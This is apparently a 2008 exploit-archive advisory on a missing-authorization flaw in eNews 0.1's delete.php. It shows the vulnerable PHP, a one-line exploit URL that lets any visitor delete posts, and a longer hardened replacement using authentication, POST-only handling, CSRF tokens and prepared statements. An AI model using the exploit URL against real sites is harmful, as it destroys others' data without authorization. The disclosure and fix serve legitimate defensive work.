eNews 0.1 (delete.php) Arbitrary Delete Post Vulnerability
Author: iLker Kandemir [MEFISTO]
Script download : http://www.hotscripts.com/Detailed/81086.html
script demo : http://emvvy.com/demos/enews/
site : www.dumenci.net
----------------------------------------------------------------
//poc: delete.php runs the DELETE as soon as a non-empty "delete" parameter arrives. Nothing before this block checks that the caller is a logged-in administrator, so any visitor (or any page that embeds the URL) can remove posts. Note that GetSQLValueString(..., "int") is the Dreamweaver helper that intval()s the value, so this is a missing-authorization flaw, not SQL injection.

if ((isset($_GET['delete'])) && ($_GET['delete'] != "")) {
    // no session / login check precedes this block
    $deleteSQL = sprintf("DELETE FROM news WHERE id=%s",
                         GetSQLValueString($_GET['delete'], "int"));
    // ... $deleteSQL is then executed against the database
}
----------------------------------------------------------------

//exploit:

http://[site]/delete.php?delete=[eNews_id]

----------------------------------------------------------------
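The fix is an access-control check in front of the DELETE, not more escaping of the id. The following is an added example of a hardened delete.php written for this advisory; it is not eNews's own code. The session keys ($_SESSION['admin_id'], $_SESSION['csrf_token']), the mysqli connection details and the redirect targets are assumptions, and GetSQLValueString() is replaced by a prepared statement so the id never enters the SQL string at all.

```php
<?php
// Hardened delete.php (added example, not eNews code).
// Assumptions: login.php sets $_SESSION['admin_id'] on a successful admin login
// and the post-list page stores a per-session token in $_SESSION['csrf_token']
// and emits it as a hidden field in each delete form.
session_start();

// 1. Authorization: only an authenticated administrator may delete posts.
//    This is the check that is absent from eNews 0.1.
if (empty($_SESSION['admin_id'])) {
    header('Location: login.php');
    exit;
}

// 2. A state-changing action must be a POST, so a plain link or <img src>
//    cannot trigger it (the original accepts GET).
if ($_SERVER['REQUEST_METHOD'] !== 'POST') {
    http_response_code(405);
    exit('Method not allowed');
}

// 3. CSRF: the form must carry the per-session token; hash_equals() avoids
//    a timing side channel on the comparison.
if (!isset($_POST['csrf_token'], $_SESSION['csrf_token'])
    || !hash_equals($_SESSION['csrf_token'], $_POST['csrf_token'])) {
    http_response_code(403);
    exit('Invalid CSRF token');
}

// 4. Validate the id as a positive integer up front instead of relying on
//    intval() inside a sprintf("%s") string.
$id = filter_input(INPUT_POST, 'delete', FILTER_VALIDATE_INT,
                   ['options' => ['min_range' => 1]]);
if ($id === false || $id === null) {
    http_response_code(400);
    exit('Bad post id');
}

// 5. Prepared statement: the id is bound as an integer parameter.
//    Connection parameters are placeholders (assumed).
$db = new mysqli('localhost', 'enews_user', 'enews_password', 'enews');
if ($db->connect_error) {
    http_response_code(500);
    exit('Database unavailable');
}

$stmt = $db->prepare('DELETE FROM news WHERE id = ?');
$stmt->bind_param('i', $id);
$stmt->execute();

if ($stmt->affected_rows === 0) {
    // Nothing deleted: unknown id. Do not leak more than that.
    http_response_code(404);
    $stmt->close();
    exit('No such post');
}

$stmt->close();
$db->close();

// 6. Redirect back to the listing (assumed index.php) so a refresh does not
//    resubmit the delete.
header('Location: index.php');
exit;
```

The order of the checks matters: authorization first, then method and CSRF, then input validation. Reversing it would let an unauthenticated caller probe which ids exist through the 400/404 responses before ever hitting the login redirect.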
tnx : aLL my FriEndZ
# milw0rm.com [2008-06-21]